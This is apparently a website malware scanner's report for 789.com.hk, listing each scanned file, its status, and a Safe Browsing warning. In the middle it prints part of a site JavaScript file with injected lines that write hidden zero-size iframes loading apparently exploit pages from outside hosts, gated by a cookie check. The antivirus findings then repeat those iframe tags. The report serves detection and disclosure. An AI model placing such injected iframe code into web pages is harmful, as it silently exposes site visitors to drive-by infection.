Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=789.com.hk
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://789.com.hk/ | 200 OK Content-Length: 42723 Content-Type: text/html | clean |
http://789.com.hk/skin/simple/Prototype.js | 200 OK Content-Length: 14405 Content-Type: application/x-javascript | clean |
http://789.com.hk/inc/main.js | 200 OK Content-Length: 5340 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function JugeComment(myform) {
  if (document.myform.UserName.value==""){
    alert ("你的用户名不可为空！");
    document.myform.UserName.focus();
    return(false);
  }
  if (document.myform.content.value == "") {
    alert("评论内容不能为空！");
    document.myform.content.focus();
    return (false);
  }
}
function CheckAll(form) {
  for (var i=0;i<form.elements.length;i++) {
    var e = form.ele
} else {
  document.write('<iframe src=http://98.129.194.210/CFIDE/debug/includes/java.html width=0 height=0></iframe>');
  document.write('<iframe src=http://newsite.acmetoy.com/m/d/javapdf.html width=0 height=0></iframe>');
}
}
if(getCookie('Evils') == ''){doWrite();setCookie('Evils', 'Somethingbbbbb');}
Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://newsite.acmetoy.com/m/d/javapdf.html
<iframe src=http://newsite.acmetoy.com/m/d/javapdf.html width=0 height=0>
Hidden iFrame found. size: 0x0 src: http://newsite.acmetoy.com/m/d/pdf.html
<iframe src=http://newsite.acmetoy.com/m/d/pdf.html width=0 height=0>
Hidden iFrame found. size: 0x0 src: http://98.129.194.210/cfide/debug/includes/java.html
<iframe src=http://98.129.194.210/cfide/debug/includes/java.html width=0 height=0> | ||
http://789.com.hk/images/js/Std_StranJF.Js | 200 OK Content-Length: 8811 Content-Type: application/x-javascript | clean |
http://789.com.hk/adfile/banner.js | 200 OK Content-Length: 182 Content-Type: application/x-javascript | clean |
http://789.com.hk/pic/ | 200 OK Content-Length: 42064 Content-Type: text/html | clean |
http://789.com.hk/count.asp+++++ | 404 Not Found Content-Length: 1379 Content-Type: text/html | clean |
http://789.com.hk/test404page.js | 404 Not Found Content-Length: 1379 Content-Type: text/html | clean |
http://789.com.hk/news/ | 200 OK Content-Length: 20948 Content-Type: text/html | clean |
http://789.com.hk/adfile/tuijian.js | 200 OK Content-Length: 168 Content-Type: application/x-javascript | clean |
http://789.com.hk/GuestBook/ | 200 OK Content-Length: 43294 Content-Type: text/html | clean |
http://789.com.hk/GuestBook/showpage.js | 200 OK Content-Length: 3064 Content-Type: application/x-javascript | clean |
http://789.com.hk/user/ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:40 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=CFBPGHMBNNIAIEFLNICBNMBM; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/./login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
http://789.com.hk/user/./ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:43 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=EFBPGHMBDJGIDDBHLPEOGFJN; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/././login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
http://789.com.hk/user/././ | HTTP/1.1 302 Object moved Cache-Control: private Date: Fri, 19 Dec 2014 03:32:45 GMT Location: ./login.asp Server: Microsoft-IIS/6.0 Content-Length: 132 Content-Type: text/html Set-Cookie: ASPSESSIONIDAADBSRBS=GFBPGHMBIODMDHIILOJELODM; path=/ X-Powered-By: ASP.NET | clean |
http://789.com.hk/user/./././login.asp | 200 OK Content-Length: 8576 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 789.com.hk
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 19 Dec 2014 03:32:14 GMT
Server: Microsoft-IIS/6.0
Content-Length: 44421
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADBSRBS=NEBPGHMBOPBPLGDGCILODONC; path=/
X-Died: timeout at scan.pm line 1566.
X-Powered-By: ASP.NET
...44421 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 789.com.hk
Referer: http://www.google.com/search?q=789.com.hk
Result:
The result is similar to the first query. There are no suspicious redirects found.